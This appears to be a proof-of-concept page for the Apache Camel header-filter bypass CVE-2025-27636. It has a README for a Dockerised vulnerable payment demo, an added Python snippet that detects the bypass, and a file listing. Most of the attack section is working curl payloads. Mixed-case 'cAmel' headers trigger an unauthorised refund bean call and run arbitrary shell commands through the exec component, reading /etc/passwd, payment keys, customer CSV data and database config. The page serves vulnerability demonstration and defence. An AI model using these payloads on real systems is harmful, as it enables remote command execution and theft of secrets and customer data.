POC details: 08061139e9b09f57d198f0af027c523ccd1f0873

Source
Related vulnerability
Title: Apache Camel security vulnerability (CVE-2025-27636)
Description: Apache Camel is an open-source integration framework from the Apache Foundation (US) built on Enterprise Integration Patterns (EIP). The framework provides plain Java object (POJO) implementations of the enterprise integration patterns and lets routing and mediation rules be configured through its API. Apache Camel has a security vulnerability caused by an error in its default filtering mechanism, which can lead to filter bypass or injection attacks.
Introduction
# Apache Camel CVE Demonstration

This project demonstrates the Apache Camel header-injection vulnerability (CVE-2025-27636): reserved `Camel*` message headers supplied by an external caller in a different letter case slip past the default header filter.

## Docker Build

Build the Docker image:
```shell
docker build -t camel-cve-demo .
```

## Docker Run

Run the container with all necessary ports:
```powershell
docker run -d `
  --name camel-cve-demo `
  -p 8080:8080 `
  -p 8081:8081 `
  -p 8484:8484 `
  -v ${PWD}/logs:/app/logs `
  -e JAVA_OPTS="-Xmx512m -Xms256m" `
  camel-cve-demo
```

## Attack Reproduction

### 1. Bean Method Injection Attack

Exploit the vulnerable endpoint by injecting a bean method name through a header (or query parameter) whose letter case differs from the filtered `Camel` prefix:

```powershell
# Successful attack - the header filter is case-sensitive
curl.exe -X POST "http://localhost:8081/api/payment/callback" -H "cAmelBeanMethodName: processRefund" -d "order_id=ORD999&amount=9999.99"

# Alternative - query parameter injection
curl.exe "http://localhost:8081/api/payment/callback?cAmelBeanMethodName=processRefund" -X POST -d "order_id=ORD999&amount=9999.99"
```

**Comparison (these should fail):**
```powershell
# Wrong case - should not work (these prefixes are caught by the filter)
curl.exe -X POST "http://localhost:8081/api/payment/callback" -H "camelbeanmethodname: processRefund" -d "order_id=ORD999&amount=9999.99"

curl.exe -X POST "http://localhost:8081/api/payment/callback" -H "CamelBeanMethodName: processRefund" -d "order_id=ORD999&amount=9999.99"
```
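The comparison above hinges on the header-name filter matching only the exact prefixes `Camel` and `camel`. The following check is added here and is not part of the original project: it models that weak filter beside a hardened, case-insensitive one and scans a constructed raw HTTP request (built from the header and query-parameter names used in the commands above) for names that only the hardened filter would drop. The weak pattern is an assumption modelled on the behaviour shown, not Camel's own source.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Weak filter modelled on the behaviour demonstrated above: only names that
# start with exactly "Camel" or "camel" are dropped, so "cAmel..." survives.
# This is an illustrative assumption, not Camel's own filter source.
WEAK_PREFIX = re.compile(r"^(Camel|camel|org\.apache\.camel)")

# Hardened filter: anchored at the start and case-insensitive, so every
# case variant of the reserved prefix is dropped before a route can act on it.
STRICT_PREFIX = re.compile(r"^(camel|org\.apache\.camel)", re.IGNORECASE)


def weak_filters(name: str) -> bool:
    return WEAK_PREFIX.match(name) is not None


def strict_filters(name: str) -> bool:
    return STRICT_PREFIX.match(name) is not None


def untrusted_names(raw_request: str) -> list[str]:
    """Header names and query-parameter names an external caller controls."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    _method, target, _version = request_line.split(" ", 2)
    names = [k for k, _ in parse_qsl(urlsplit(target).query, keep_blank_values=True)]
    names += [line.split(":", 1)[0].strip() for line in header_lines if ":" in line]
    return names


def bypass_candidates(raw_request: str) -> list[str]:
    """Names the hardened filter drops but the weak filter lets through."""
    return [n for n in untrusted_names(raw_request)
            if strict_filters(n) and not weak_filters(n)]


# Constructed sample request assembled from the curl commands in this README.
SAMPLE_REQUEST = (
    "POST /api/payment/callback?cAmelBeanMethodName=processRefund HTTP/1.1\r\n"
    "Host: localhost:8081\r\n"
    "CamelBeanMethodName: processRefund\r\n"
    "camelbeanmethodname: processRefund\r\n"
    "cAmelExecCommandExecutable: /bin/sh\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "order_id=ORD999&amount=9999.99"
)

if __name__ == "__main__":
    for name in bypass_candidates(SAMPLE_REQUEST):
        print("weak filter lets through reserved header name:", name)
```

The same anchored, case-insensitive test can be applied at a reverse proxy or WAF in front of the Camel service to drop such names before they reach the route.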

### 2. Command Execution Attack

Exploit the exec component to run arbitrary commands by supplying its reserved headers in a case the filter does not recognise:

**Reconnaissance:**
```powershell
# Check current directory
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: /bin/sh" -H "cAmelExecCommandArgs: -c pwd"

# List config directory
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: /bin/sh" -H "cAmelExecCommandArgs: -c ls -la /app/config/"

# Find configuration files
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: /bin/sh" -H "cAmelExecCommandArgs: -c find / -name database.conf 2>/dev/null"
```

**Data Exfiltration:**
```powershell
# Read database configuration
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: cat" -H "cAmelExecCommandArgs: /etc/app/config/database.conf"

# Read payment secrets
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: cat" -H "cAmelExecCommandArgs: /app/secrets/payment.key"

# Read customer data
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: cat" -H "cAmelExecCommandArgs: /var/data/customers/customers.csv"

# Read audit logs
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: cat" -H "cAmelExecCommandArgs: /var/log/audit/audit.log"

# Read system users
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: cat" -H "cAmelExecCommandArgs: /etc/passwd"

# List processes
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: ps" -H "cAmelExecCommandArgs: aux"
```

## Verify Attack Results

Check the attack logs inside the container:

```shell
# View unauthorized refund attempts
docker exec camel-cve-demo cat /tmp/unauthorized_refund.txt
```

## Ports

- **8080**: Main application (frontend)
- **8081**: Bean injection vulnerable endpoint
- **8484**: Exec injection vulnerable endpoint

File snapshot

```
[4.0K] /data/pocs/08061139e9b09f57d198f0af027c523ccd1f0873
├── [4.6K] Dockerfile
├── [4.1K] pom.xml
├── [3.3K] README.md
└── [4.0K] src
    └── [4.0K] main
        ├── [4.0K] java
        │   └── [4.0K] com
        │       └── [4.0K] example
        │           └── [4.0K] camel
        │               ├── [ 881] CamelCveDemoApplication.java
        │               ├── [4.0K] config
        │               │   ├── [1.5K] CamelConfig.java
        │               │   └── [ 903] CorsConfig.java
        │               ├── [4.0K] controller
        │               │   └── [ 523] WebController.java
        │               ├── [4.0K] routes
        │               │   ├── [5.9K] BeanRoute.java
        │               │   └── [6.5K] ExecRoute.java
        │               └── [4.0K] service
        │                   └── [6.1K] DemoService.java
        └── [4.0K] resources
            ├── [ 530] application.properties
            ├── [1.3K] logback-spring.xml
            └── [4.0K] static
                └── [ 11K] index.html

12 directories, 13 files
```